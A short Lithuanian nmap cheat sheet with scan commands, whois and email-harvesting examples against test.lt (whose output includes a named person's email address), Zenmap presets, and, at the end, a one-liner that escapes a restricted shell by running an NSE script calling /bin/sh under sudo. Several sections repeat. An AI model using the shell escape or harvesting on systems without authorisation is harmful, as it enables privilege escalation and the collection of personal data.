Skanavimas veikia, kai srautą blokuoja
ugniasienė, skenuojamas 21 portas
$ sudo nmap -p 21 x.x.x.x -PN
$ sudo nmap -sP 192.168.1.0/24
Skenuoja domeno portus ir pateikia whois informaciją
$ nmap --script whois test.lt
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-26 15:04 EEST
Nmap scan report for test.lt (195.8.218.22)
Host is up (0.0084s latency).
rDNS record for 195.8.218.22: domains.domreg.lt
Not shown: 996 filtered ports
PORT STATE SERVICE
43/tcp open whois
53/tcp open domain
80/tcp open http
443/tcp open https
Host script results:
| whois: Record found at whois.ripe.net
| inetnum: 195.8.218.0 - 195.8.219.255
| netname: DOMREG_LT
| descr: Kauno Technologijos Universitetas
| country: LT
| orgname: Kauno Technologijos Universitetas
| organisation: ORG-KTU2-RIPE
| email: hostmaster@domreg.lt
| person: Tomas Mackus
|_email: tomas@domreg.lt
zenmap išankstiniai nustatymai, ačiū Jerret
$ sudo nmap -p 21 x.x.x.x -PN
Skenuoja 192.168.1.0 potinklį ir nurodo veikiančius įrenginius.
$ sudo nmap -sP 192.168.1.0/24
Domanai
Skenuoja domeno portus ir pateikia whois informaciją
$ nmap --script whois test.lt
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-26 15:04 EEST
Nmap scan report for test.lt (195.8.218.22)
Host is up (0.0084s latency).
rDNS record for 195.8.218.22: domains.domreg.lt
Not shown: 996 filtered ports
PORT STATE SERVICE
43/tcp open whois
53/tcp open domain
80/tcp open http
443/tcp open https
Host script results:
| whois: Record found at whois.ripe.net
| inetnum: 195.8.218.0 - 195.8.219.255
| netname: DOMREG_LT
| descr: Kauno Technologijos Universitetas
| country: LT
| orgname: Kauno Technologijos Universitetas
| organisation: ORG-KTU2-RIPE
| email: hostmaster@domreg.lt
| person: Tomas Mackus
|_email: tomas@domreg.lt
Ieško su domenu susijusius pašto adresus
nmap -p80 --script http-email-harvest test.lt
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-26 15:02 EEST
Nmap scan report for test.lt (195.8.218.22)
Host is up (0.0047s latency).
rDNS record for 195.8.218.22: domains.domreg.lt
PORT STATE SERVICE
80/tcp open http
| http-email-harvest:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=test.lt
|_ hostmaster@domains.lt
zenmap išankstiniai nustatymai, ačiū Jerret
- Intense Scan (-T4 -A -v)
- Intense Scan plus UDP (-sS -sU -T4 -A -v)
- Intense Scan, all TCP Ports (-p 1-65535 -T4 -A -v)
- Intense Scan, no PING (-T4 -A -v -Pn)
- Ping Scan (-sn)
- Quick Scan (-T4 -F)
- Quick Scan Plus (-sV -T4 -O -F --version-light)
- Quick Traceroute (-sn --traceroute)
- Regular Scan (no options are used)
- Slow Comprehensive Scan (-sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)")
Kaip ištrūkti iš apriboti apvalkalo su nmap?
$ echo "os.execute('/bin/sh')" > x.nse
$ sudo nmap –script=x.nse
